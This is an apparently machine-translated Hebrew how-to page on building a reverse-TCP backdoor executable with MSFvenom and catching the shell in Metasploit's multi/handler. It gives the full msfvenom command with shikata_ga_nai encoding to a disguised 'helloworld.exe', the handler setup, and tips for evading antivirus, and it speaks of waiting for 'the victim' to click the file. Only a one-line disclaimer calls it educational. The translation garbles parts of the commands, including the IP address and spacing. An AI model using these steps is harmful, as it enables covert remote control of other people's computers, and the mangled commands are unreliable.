כיצד ליצור דלת אחורית כמעט שלא ניתנת לזיהוי באמצעות MSFvenom בקאלי לינוקס?

הקלד msfvenom מקודדים כדי להציג את רשימת המקודדים
הקלד msfvenom מקודדים כדי להציג את רשימת המקודדים.

דלת אחורית משמשת לעקיפת מנגנוני אבטחה, לרוב בחשאי ובעיקר ללא גילוי. באמצעות MSFvenom, השילוב של msfpayload ו- msfencode, ניתן ליצור דלת אחורית המתחברת חזרה לתוקף באמצעות TCP פגז הפוך. על מנת לפתח דלת אחורית, עליך לשנות את חתימת התוכנה הזדונית שלך כדי להתחמק מתוכנת אנטי-וירוס כלשהי. השלם את הפרויקט על זוג מחשבים שיש לך הרשאה לגשת אליהם, ובתוך כך תוכלו ללמוד עוד על אבטחת מחשבים וכיצד פועל סוג זה של דלת אחורית.

צעדים

  1. 1
    הפעל את הקאלי והדליק את קונסולת המסוף.
  2. 2
    הקלד ifconfig כדי להציג את הממשק ובדוק את כתובת ה- IP שלך.
  3. 3
    הקלד msfvenom -l encoders כדי להציג את רשימת המקודדים.
    • אתה ישמש x86/shikata_ga_nai כמקודד.
  4. 4
    הקלד "msfvenom -a x86 - פלטפורמת windows -p windows / shell / reverse_tcp LHOST = 192,168.48,129 lport = 4444 -b" \ x00" -e x86 / shikata_ga_nai -f exe> helloworld.exe
    • -a x86 - platform windows מייעד אדריכלות לשימוש.
    • -p windows/shell/reverse_tcp מייעד את המטענים להטמיע.
    • LHOST מייעד את כתובת ה- IP של המאזין.
    • LPORT מייעד את נמל המאזין.
    • -b "\x00" מייעד להימנע מאופי רע (בתים null).
    • -e x86/shikata_ga_nai מייעד את שם המקודדים.
    • -f exe > helloWorld.exe מייעד פלט פורמט.
  5. 5
    הקלד msfconsole כדי להפעיל את metasploit.
    • עכשיו יצרת את הדלת האחורית שלך. כאשר הקורבן לוחץ על helloWorld.exe, מטען הקליפה המוטמע יופעל ויהיה חיבור חזרה למערכת שלך. על מנת לקבל את החיבור, עליך לפתוח את המטפל המרובה ב- Metasploit ולהגדיר את המטענים.
  6. 6
    סוג use exploit/multi/handler.
  7. 7
    סוג set payload windows/shell/reverse_tcp.
  8. 8
    הקלד show options כדי לבדוק את המודול.
  9. 9
    סוג set LHOST 192,168.48,129.
    • "LHOST" מייעד את כתובת ה- IP של המאזין.
  10. 10
    סוג set LPORT 4444.
    • "LPORT" מייעד את יציאת המאזינים.
  11. 11
    הקלד run והמתן לחיבור ממכונת הקורבן.
  12. 12
    המתן שהקורבן ילחץ על helloworld.exe. ואז תחובר בהצלחה למכונה של הקורבן.
הקלד חלונות מטען להגדיר / מעטפת / reverse_tcp
הקלד חלונות מטען להגדיר / מעטפת / reverse_tcp.

טיפים

  • שימוש ב- i <numbers> ב- MSFvenom יציג את האיטרציות של קידוד. לפעמים איטרציות נוספות עשויות לעזור להתחמק מתוכנת ה- AV.
  • למדת כיצד ליצור את הדלת האחורית ולקודד באמצעות MSFvenom, אך שיטה זו לא תפעל בצורה מושלמת כנגד חלק מתוכנות ה- AV בימינו. הסיבה מאחורי זה היא בגלל תבניות הביצוע ב- MSFvenom. ספקי ה- AV הוסיפו את החתימה הסטטית של תבניות אלה ופשוט חיפשו אותן. הפתרון לבעיה זו הוא שימוש בתבנית ביצוע אחרת או בכלים שונים.

אזהרות

  • מאמר זה מיועד למטרות חינוכיות בלבד. פריצה ללא אישור או אישור אינה אתית ולעתים קרובות אינה חוקית.

דברים שתזדקק להם

  • קאלי לינוקס
  • חלונות
  • מכונה וירטואלית
    • VirtualBox
    • VMware

שאלות ותשובות

  • מה עלי לעשות אם מופיעה שגיאה בעת יצירת הניצול?
    וודא שעשית הכל נכון ונסה שוב. ודא שאתה מפעיל את Kali Linux.

FacebookTwitterInstagramPinterestLinkedInGoogle+YoutubeRedditDribbbleBehanceGithubCodePenWhatsappEmail